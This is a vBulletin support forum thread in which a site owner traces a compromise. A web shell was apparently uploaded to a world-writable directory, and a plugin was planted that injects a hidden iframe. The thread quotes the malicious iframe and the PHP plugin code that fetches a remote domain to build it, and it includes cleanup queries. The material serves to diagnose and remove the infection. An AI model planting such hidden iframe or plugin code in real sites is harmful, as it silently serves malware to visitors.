Announcement

Collapse
No announcement yet.

Code inserted in to my templates.

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Code inserted in to my templates.

    Hi I wonder if I could ask for some urgent help.
    I'm running vb 3.8.
    Someone has managed to add some code to my vB implementation that is calling a nasty script.
    However I can't see any changed php files or templates.
    Anyone ideas where I start with finding out what's happened here?

    HTML Code:
    <script type="text/javascript">
    <!--
    	// Main vBulletin Javascript Initialization
    	vBulletin_init();
    //-->
    </script>
    <iframe name="fra" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://koren.in/x/?id=766&hash=a25144ea1f7195206c5f614241cd4844"></iframe>
    The attached source shows where the nasty iframe is getting embedded.
    Any help much appreciated.
    Thanks
    Dave

  • #2
    Hi.
    Right I now know that $lol was placed in the footer template for a couple of styles that were live.
    I assume that $lol then inserts the IFRAME code. However I can't find anything that mentions of $lol inthe variables or how it could have been done.
    So although I've now removed $lol from the templates I need to find out where that is and also to find out where it's happened.
    I could be that one of the Administrators has had their accounts hacked, I can't see anything in the control panel logs.
    The site was hammered this morning for about 2 hours so I guess that could have been a dictionary attack trying to crack an Admins password?
    Any help appreciated!
    Cheers
    Dave

    Comment


    • #3
      Did you look through your access_logs? Look in your plugins? Run maintenance > diagnostics > suspect file versions and see if there is some strange file listed there.

      Please don't PM or VM me for support - I only help out in the threads.
      vBulletin Manual & vBulletin 4.0 Code Documentation (API)
      Want help modifying your vbulletin forum? Head on over to vbulletin.org
      If I post CSS and you don't know where it goes, throw it into the additional.css template.

      W3Schools &lt;- awesome site for html/css help

      Comment


      • #4
        Hi Lynne. Thank you for your reply.
        I have been looking over the various logs all day so far to see how this happened.

        Suspect file version - yes done the check. Nothing found.
        Access logs - Yes nothing in there.
        Looked in plugins - Nothing strange there.

        So I know that the template has been edited as taking out the added text has removed the malicious iframe code.

        I can't find the reference to $lol anywhere in vB and it must be in there somewhere.

        I think I may have been subject to an exploit as I'm not on the very latest version of 3.8. I will do that in a mo. I was going to go straight to vB4 but I'm not ready for 4 yet.

        Comment


        • #5
          Sorry, I'm not an expert on this sort of thing. Perhaps someone else can come along with more specifics on what to look for.

          Please don't PM or VM me for support - I only help out in the threads.
          vBulletin Manual & vBulletin 4.0 Code Documentation (API)
          Want help modifying your vbulletin forum? Head on over to vbulletin.org
          If I post CSS and you don't know where it goes, throw it into the additional.css template.

          W3Schools &lt;- awesome site for html/css help

          Comment


          • #6
            No. Thank you Lynne any help is appreciated.
            We've just found the source. My own stupid fault.
            A very old directory with 777 permissions that was used to store pics in.
            An R57shell script has been uploaded and then it looks like used to break the MySQL password. Which was the outage earlier this morning I assume.
            So any hacking was done via MySQL with the template presumably edited from there.

            Comment


            • #7
              I've found some more.... information.
              I've been searching the MySQL tables and have found the following in the vb_datastore table.
              However I'm not exactly sure what is in the datastore tables.
              I can see that there appear to be plugin's.
              Can anyone help me?

              $domain = file_get_contents('http://kornoval.com:21/domain/tb.txt');
              $id = '766';
              $hash = 'a25144ea1f7195206c5f614241cd4844';
              $lol = "<iframe name=\"fra\" width=\"1\" height=\"1\" scrolling=\"no\" frameborder=\"no\" marginwidth=\"0\" marginheight=\"0\" src=\"http://$domain/x/?id=$id&hash=$hash\"></iframe>";

              Comment


              • #8
                And found the plugin finally. The malicious code was in a plugin entitled......

                AME : Permission Hide

                Comment


                • #9
                  im having the same problem. i had the ame product installed and have now removed it. i cant find any $lol in the templates but google webmaster tools shows me a bunch of threads that are infected so im deleting them now one by one to see if that fixes the problem.

                  Comment


                  • #10
                    I don't think its specifically the AME product. Any of them could have been chosen in my case to hide the infection.
                    I found running some SQL queries against the template or plugins table quite useful.
                    So like this....
                    Code:
                    SELECT * FROM vb_plugin WHERE phpcode LIKE "%$lol%";

                    Comment


                    • #11
                      where you able to remove the malicious code completely?

                      google is still calling my site malicious, i submitted a thing though the webmaster tools to have it reviewed, does anybody know how long it takes?
                      Last edited by wtrk; Thu 25 Feb '10, 2:01pm.

                      Comment


                      • #12
                        Originally posted by wtrk View Post
                        where you able to remove the malicious code completely?

                        google is still calling my site malicious, i submitted a thing though the webmaster tools to have it reviewed, does anybody know how long it takes?
                        Yes I was able to remove it all completely but it was hard work to identify.
                        My site was I think only compromised for a few hours so I'm sure that helped with Google not picking anything up. Checking the Webmaster tools now it says that it hasn't found any malware.
                        However because my server has been compromised and I can't be sure what else has been done I'm considering a full rebuild.. just to be sure.
                        There's a definite lesson here in a being careful in use of 777 CHMOD'd directories! I had the attitude that it wouldn't really happen to me as my site is relatively small with 6000 uniques per day.
                        So I've learnt a lesson the hard way.

                        Comment

                        widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                        Working...
                        X